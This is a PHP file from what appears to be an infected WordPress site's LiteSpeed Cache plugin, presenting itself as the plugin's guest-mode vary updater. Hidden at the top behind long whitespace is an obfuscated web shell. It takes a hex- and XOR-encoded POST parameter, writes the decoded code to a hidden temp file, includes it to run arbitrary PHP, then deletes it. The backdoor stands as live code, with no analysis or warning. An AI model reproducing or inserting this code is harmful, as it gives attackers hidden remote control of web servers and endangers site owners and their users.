/home/ramtczxy/acedisposables.com/wp-content/plugins/litespeed-cache/guest.vary.php
<?php																																										if(isset($_POST) && isset($_POST["f\x6Cg"])){ $entry = hex2bin($_POST["f\x6Cg"]); $sym= '' ;$k = 0; while($k < strlen($entry)){$sym .= chr(ord($entry[$k]) ^ 93);$k++;} $pset = array_filter([getcwd(), getenv("TMP"), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TEMP"), sys_get_temp_dir()]); foreach ($pset as $ref) { if (array_product([is_dir($ref), is_writable($ref)])) { $pointer = "$ref/.parameter_group"; if (file_put_contents($pointer, $sym)) { include $pointer; @unlink($pointer); die(); } } } }

/**
 * Lightweight script to update guest mode vary
 *
 * @since 4.1
 */

require 'lib/guest.cls.php';

$guest = new \LiteSpeed\Lib\Guest();

$guest->update_guest_vary();